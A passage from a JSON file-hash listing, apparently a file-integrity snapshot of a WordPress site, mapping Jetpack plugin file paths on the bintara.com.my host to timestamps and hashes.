dget-conditions\\/widget-conditions.css\":{\"d\":1544704143,\"h\":\"7946abd180b257e03acd9a122b991a09\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widget-visibility\\/widget-conditions\\/widget-conditions-rtl.css\":{\"d\":1544704143,\"h\":\"e357c79080a2790bf0e3f92decf1fae6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widget-visibility\\/widget-conditions\\/widget-conditions.js\":{\"d\":1544704143,\"h\":\"c077b9c43e9a8198c58b24c0e1937a15\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widget-visibility\\/widget-conditions.php\":{\"d\":1544704143,\"h\":\"bea6d2fd36f3aa9fcbb0903eb5bdde40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/wordads\\/php\\/networks\\/amazon.php\":{\"d\":1544704143,\"h\":\"c94269a3fa36d915edd970f14fd39fbc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/wordads\\/php\\/api.php\":{\"d\":1544704143,\"h\":\"4abf09c1489e1df5b3628c612a8cb997\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/wordads\\/php\\/widgets.php\":{\"d\":1544704143,\"h\":\"cd0323cccf21f549245e4b62dc2cc442\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/wordads\\/php\\/cron.php\":{\"d\":1544704143,\"h\":\"5ce2b4394ddc1f78974c724751590425\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/wordads\\/php\\/admin.php\":{\"d\":1544704143,\"h\":\"91ab1f2563a9fd0c7237b71a86299e40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/wordads\\/php\\/params.php\":{\"d\":1544704143,\"h\":\"3b3d1e7d4efa2d78699a18ae1f13b1bf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/wordads\\/css\\/style.css\":{\"d\":1544704143,\"h\":\"c980cb044361631a11e3dedc9110384e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/wordads\\/wordads.php\":{\"d\":1544704143,\"h\":\"e049e0a6c9d2b5df0c69262a5ce1f61c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/markdown\\/easy-markdown.php\":{\"d\":1544704143,\"h\":\"2d181db8fb01e97107f17430a4b47506\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-buffer-image-fallback.php\":{\"d\":1544704143,\"h\":\"046d02b11c19e8299eb720b1da289772\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-builder.php\":{\"d\":1544704143,\"h\":\"69a3a7eded884ace98b2a97fd70ac1e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-finder.php\":{\"d\":1544704143,\"h\":\"40fecb7c99626e15c92cbb5c02e556b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-buffer-page-fallback.php\":{\"d\":1544704143,\"h\":\"a04d4a43603f943f65c86e79134592aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-constants.php\":{\"d\":1544704143,\"h\":\"4c060cd894b978b53b9702a0f4d589f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-stylist.php\":{\"d\":1544704143,\"h\":\"22306b01b2a5b051987ac65fc91dd204\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-buffer-video.php\":{\"d\":1544704143,\"h\":\"cfd8571b6e44555fde3b9f4c0548d794\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-logger.php\":{\"d\":1544704143,\"h\":\"d65374e471076fe2b4b9e3272a104fd9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-buffer-image.php\":{\"d\":1544704143,\"h\":\"e3eb3c783945222389b00352e25a8f5b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-buffer-page.php\":{\"d\":1544704143,\"h\":\"f70bf7b1b95be44a8707c63bddcfb2bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-buffer.php\":{\"d\":1544704143,\"h\":\"46a56e1439d443835885d5159b1a1b33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-buffer-video-fallback.php\":{\"d\":1544704143,\"h\":\"536fad320e4fd93c036791d15e665b0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemaps.php\":{\"d\":1544704143,\"h\":\"415fae7c382fde4079997cdab529b6e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-buffer-master.php\":{\"d\":1544704143,\"h\":\"4a630d589e79ca9358c3c5302b1484db\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-buffer-news-fallback.php\":{\"d\":1544704143,\"h\":\"affdf6dc32d3891504df76609abbec43\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-buffer-news.php\":{\"d\":1544704143,\"h\":\"f515e02693f76c8b91021e399162e818\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-buffer-fallback.php\":{\"d\":1544704143,\"h\":\"c4534cfc7e638382fe041a8dbeb49479\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-buffer-master-fallback.php\":{\"d\":1544704143,\"h\":\"e560af10d9c3b15438397182eecdd176\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-librarian.php\":{\"d\":1544704143,\"h\":\"fbd997dc9ca7046834765d59392dc254\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sitemaps\\/sitemap-state.php\":{\"d\":1544704143,\"h\":\"24c14399d769e4310ee80ab72ce52da1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/editor-inline-editing-style-rtl.css\":{\"d\":1544704143,\"h\":\"7da528a011c11b1ad349b479bf6bfbe0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/editor-ui-rtl.css\":{\"d\":1544704143,\"h\":\"ccba52a7b47ebafe170c9ccdbe5397ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/grunion.css\":{\"d\":1544704143,\"h\":\"a5d1fb63184f8699c6306d7a4b0b2f3a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/editor-inline-editing-style.min.css\":{\"d\":1544704143,\"h\":\"4adb550e7d7af963bf58071c1d6b38e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/jquery-ui-datepicker.css\":{\"d\":1544704143,\"h\":\"d2ca5575ea33f7e6bd9c7679fb81c706\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/editor-ui.min.css\":{\"d\":1544704143,\"h\":\"1ea315c96198dc7c669bfb12634f7c83\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/editor-style.css\":{\"d\":1544704143,\"h\":\"df8c5f55d0d500267cd3f5d71859d86e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/editor-inline-editing-style-rtl.min.css\":{\"d\":1544704143,\"h\":\"eee8700d34946cb18a5dd6173dd34361\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/grunion-rtl.css\":{\"d\":1544704143,\"h\":\"3c9d358bd3ac59cb3edb7c98ee2b964e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/editor-style-rtl.min.css\":{\"d\":1544704143,\"h\":\"64aabb5a3d06f6fccf2785e7c25922b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/editor-style.min.css\":{\"d\":1544704143,\"h\":\"958db04f864bfb11467ba0da52ec9bb1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/editor-inline-editing-style.css\":{\"d\":1544704143,\"h\":\"94d6d1c24be69a6c8e29372b2bdbc35e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/editor-ui-rtl.min.css\":{\"d\":1544704143,\"h\":\"67ddc9479cfbcc56c1a9fda94b978203\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/editor-style-rtl.css\":{\"d\":1544704143,\"h\":\"2cea695a2975142f5c244ecdeb7feeae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/css\\/editor-ui.css\":{\"d\":1544704143,\"h\":\"897b62a5a70afd3f687489276197d03c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/js\\/grunion.js\":{\"d\":1544704143,\"h\":\"7003617caf0dd198d89153c8f95a82ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/js\\/grunion-admin.js\":{\"d\":1544704143,\"h\":\"de886bc4fb47391e04288e02d3b7d33b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/js\\/tinymce-plugin-form-button.js\":{\"d\":1544704143,\"h\":\"65e1a8dbf4865e8e81fa7cd612e6a33d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/js\\/grunion-frontend.js\":{\"d\":1544704143,\"h\":\"5f2bff1265beb5652c9b9f71cec7d6f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/js\\/editor-view.js\":{\"d\":1544704143,\"h\":\"2b58816ab14a770251c7aab3f2339974\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/admin.php\":{\"d\":1544704143,\"h\":\"583ac9a6002c539e585ca969fe18d899\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/grunion-form-view.php\":{\"d\":1544704143,\"h\":\"386586525310a2075ac492b9d8c3541a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/grunion-contact-form.php\":{\"d\":1544704143,\"h\":\"ec7e5750b3977f1bf95ceaf90c430279\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/grunion-editor-view.php\":{\"d\":1544704143,\"h\":\"8ce3bf90f4ade19e7cfbfa3c66c693c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/contact-form\\/class-grunion-contact-form-endpoint.php\":{\"d\":1544704143,\"h\":\"1017108a3813518c0582dfc92936f25c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/subscriptions\\/subscriptions.css\":{\"d\":1544704143,\"h\":\"eefa6c503656fdac445f6f36e1608672\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/photon\\/photon.js\":{\"d\":1544704143,\"h\":\"366237f21d8c5a9d8fcfe0d78c13362b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/lazy-images\\/js\\/lazy-images.js\":{\"d\":1544704143,\"h\":\"c1742c0a38813846f1ee3640b6869b76\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/lazy-images\\/lazy-images.php\":{\"d\":1544704143,\"h\":\"73faf874267768093b97621e675794e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/comments\\/admin.php\":{\"d\":1544704143,\"h\":\"4e0a0cab6e8c6f7947a26628b7dfd52d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/comments\\/comments.php\":{\"d\":1544704143,\"h\":\"2dbfcbab3b2ff6ceed5a84f1327b3e0d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/comments\\/base.php\":{\"d\":1544704143,\"h\":\"77393dbeaadf9fb0ed14e769ee8ce8b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/comment-likes\\/admin-style.css\":{\"d\":1544704143,\"h\":\"ea2e032ce5b1a3c2fe39193c11895ce7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/comment-likes\\/comment-like-count.js\":{\"d\":1544704143,\"h\":\"003c2ab9aab31cc6c2a85159ca543bc6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sharedaddy\\/sharing.php\":{\"d\":1544704143,\"h\":\"dacfbd083bc2e5a4d7373dedd610cd4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sharedaddy\\/admin-sharing.min.css\":{\"d\":1544704143,\"h\":\"3739361793dd4e2c0b932163f83bbb62\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sharedaddy\\/recaptcha.php\":{\"d\":1544704143,\"h\":\"9708598ebca05cda7b652d3bf5189680\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sharedaddy\\/admin-sharing-rtl.css\":{\"d\":1544704143,\"h\":\"cb20c87608e81a44abd8f8fa8e50094f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sharedaddy\\/admin-sharing.js\":{\"d\":1544704143,\"h\":\"8a6050cf11679593152131feb89728b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sharedaddy\\/admin-sharing.css\":{\"d\":1544704143,\"h\":\"1fff6dbcb2ac739139cd14b5f9bda450\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sharedaddy\\/admin-sharing-rtl.min.css\":{\"d\":1544704143,\"h\":\"75b54e095ade30eda20eb5d971f13d09\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sharedaddy\\/sharing-sources.php\":{\"d\":1544704143,\"h\":\"33b09a95bdcc7d03831ac4fcd82fb0b2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sharedaddy\\/sharing-service.php\":{\"d\":1544704143,\"h\":\"5edd9f61abf7aff07f3afc579e6bf1b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sharedaddy\\/sharing.js\":{\"d\":1544704145,\"h\":\"68659abf7562889d52e3d5fed7230431\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sharedaddy\\/sharedaddy.php\":{\"d\":1544704145,\"h\":\"33a870f9e61b01eeda32943dfb6e6c2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sharedaddy\\/sharing.css\":{\"d\":1544704145,\"h\":\"aa0243aa87841c00012a5f8f383362f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/verification-tools\\/verification-tools-utils.php\":{\"d\":1544704145,\"h\":\"601682b7fa13103eeaddccd4baf3a183\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/verification-tools\\/blog-verification-tools.php\":{\"d\":1544704145,\"h\":\"299485ac2de63d1690a08e68e65b88de\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/publicize\\/assets\\/rtl\\/publicize-rtl.css\":{\"d\":1544704145,\"h\":\"13c0dcd879deaba83c3d8c957b087991\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/publicize\\/assets\\/publicize.js\":{\"d\":1544704145,\"h\":\"aa663af8c9847d29095bc5d3df0a81a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/publicize\\/assets\\/publicize.css\":{\"d\":1544704145,\"h\":\"c35ebc3c2fd716a715767a0a3b71d4d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/publicize\\/assets\\/publicize-rtl.min.css\":{\"d\":1544704145,\"h\":\"8216aae018bb927f3f7b64f98ba636b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/publicize\\/assets\\/publicize-rtl.css\":{\"d\":1544704145,\"h\":\"b172fe564ccc3c57deab5933168a8419\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/publicize\\/assets\\/publicize.min.css\":{\"d\":1544704145,\"h\":\"bc557a3962ba919ffe8ae830dae83ecf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/publicize\\/enhanced-open-graph.php\":{\"d\":1544704145,\"h\":\"d8f6747e1120c7ddab771d68e1f300be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/publicize\\/publicize-jetpack.php\":{\"d\":1544704145,\"h\":\"2cf0ea43e4ac2db391f304804a103b5a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/publicize\\/ui.php\":{\"d\":1544704145,\"h\":\"b8aced3f803607c71c0b0c4f47c2b917\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/publicize\\/publicize.php\":{\"d\":1544704145,\"h\":\"3da840801d2b689c15964319e865b622\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/css\\/videopress-editor-style-rtl.min.css\":{\"d\":1544704145,\"h\":\"6fdb32ad3ce62c2d7f90847be231c386\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/css\\/editor-rtl.css\":{\"d\":1544704145,\"h\":\"ea4d8f2fc8af92a56d6e61d5e3f908cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/css\\/videopress-editor-style-rtl.css\":{\"d\":1544704145,\"h\":\"ac991b6f2de0276a61b541cc3491f01c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/css\\/editor-rtl.min.css\":{\"d\":1544704145,\"h\":\"e69b403a8d4a12c0d6792aea818c9cdd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/css\\/editor.css\":{\"d\":1544704145,\"h\":\"b09c1d6eb174051db20255d8f49127f8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/css\\/videopress-editor-style.css\":{\"d\":1544704145,\"h\":\"8a91125a03e99bfb2f8cfe8092449bf0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/css\\/editor.min.css\":{\"d\":1544704145,\"h\":\"448c18eac8c741a45f3fad72ed70e18c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/css\\/videopress-editor-style.min.css\":{\"d\":1544704145,\"h\":\"6476f6d9f595f0230099f1de31086d8c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/js\\/videopress-plupload.js\":{\"d\":1544704145,\"h\":\"dcfd781eee592576addfec8db6d91b35\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/js\\/media-video-widget-extensions.js\":{\"d\":1544704145,\"h\":\"f41f45875e0a052b361a317fb664bc7f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/js\\/videopress-uploader.js\":{\"d\":1544704145,\"h\":\"5f321e3cabf90b0221ed4e3551af7c97\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/js\\/editor-view.js\":{\"d\":1544704145,\"h\":\"c46bb0e2a9fca99147681dfcc28fbe3b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/class.videopress-xmlrpc.php\":{\"d\":1544704145,\"h\":\"40b6a1a59b28c62cd5c151a4175830d5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/shortcode.php\":{\"d\":1544704145,\"h\":\"86ffcfde31186b45a097cde1851c99dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/class.videopress-player.php\":{\"d\":1544704145,\"h\":\"75eeab5adee9b67684e2fa1a8958df6e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/editor-media-view.php\":{\"d\":1544704145,\"h\":\"831f32015a0a3d90e478b4bf5f10b809\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/class.jetpack-videopress.php\":{\"d\":1544704145,\"h\":\"5f70f885a5d67513c4e3a2301f6e508c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/videopress-admin.css\":{\"d\":1544704145,\"h\":\"d1bdab678e7a76331d8d9ef003a257e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/class.videopress-cli.php\":{\"d\":1544704145,\"h\":\"116394d20bc2b6ce64c1aa4bd862665b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/videopress-admin-rtl.min.css\":{\"d\":1544704145,\"h\":\"d1521c0c6c016bd878c6675e8725a844\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/class.videopress-video.php\":{\"d\":1544704145,\"h\":\"a4ea5fefc4661b33474cf4a5f17de288\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/class.videopress-options.php\":{\"d\":1544704145,\"h\":\"414eaf84f51329c47d46391b7d74f6e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/utility-functions.php\":{\"d\":1544704145,\"h\":\"8a7f6919c1eabb9e1525b748f2fd2dcc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/videopress-admin-rtl.css\":{\"d\":1544704145,\"h\":\"60fde1f414e1e1c424f1375b3467c907\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/class.videopress-scheduler.php\":{\"d\":1544704145,\"h\":\"b94458f6a8cab219d26e9d1af99b1f0d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/class.videopress-ajax.php\":{\"d\":1544704145,\"h\":\"edf2df10a74e8e8d67d28da8f9ae3208\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/videopress-admin.min.css\":{\"d\":1544704145,\"h\":\"10c098a8b4ac99dec51fb1b84166b8d2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/videopress\\/class.videopress-edit-attachment.php\":{\"d\":1544704145,\"h\":\"d2b388b53b7e9e5dc0f1d0c839530d4a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/rtl\\/tiled-gallery-rtl.css\":{\"d\":1544704145,\"h\":\"b58e13b84a5721a9d2520829737bbdf1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/templates\\/partials\\/carousel-image-args.php\":{\"d\":1544704145,\"h\":\"a9e79469bdf4635af16b9d5d5456ca12\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/templates\\/partials\\/item.php\":{\"d\":1544704145,\"h\":\"34f657db434166cbc3c06b0fed19729a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/templates\\/square-layout.php\":{\"d\":1544704145,\"h\":\"e7c9d74f8ced15013272b6e761689a2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/templates\\/carousel-container.php\":{\"d\":1544704145,\"h\":\"fc4b01381d6df8a7cf10b5a5f1031dcc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugin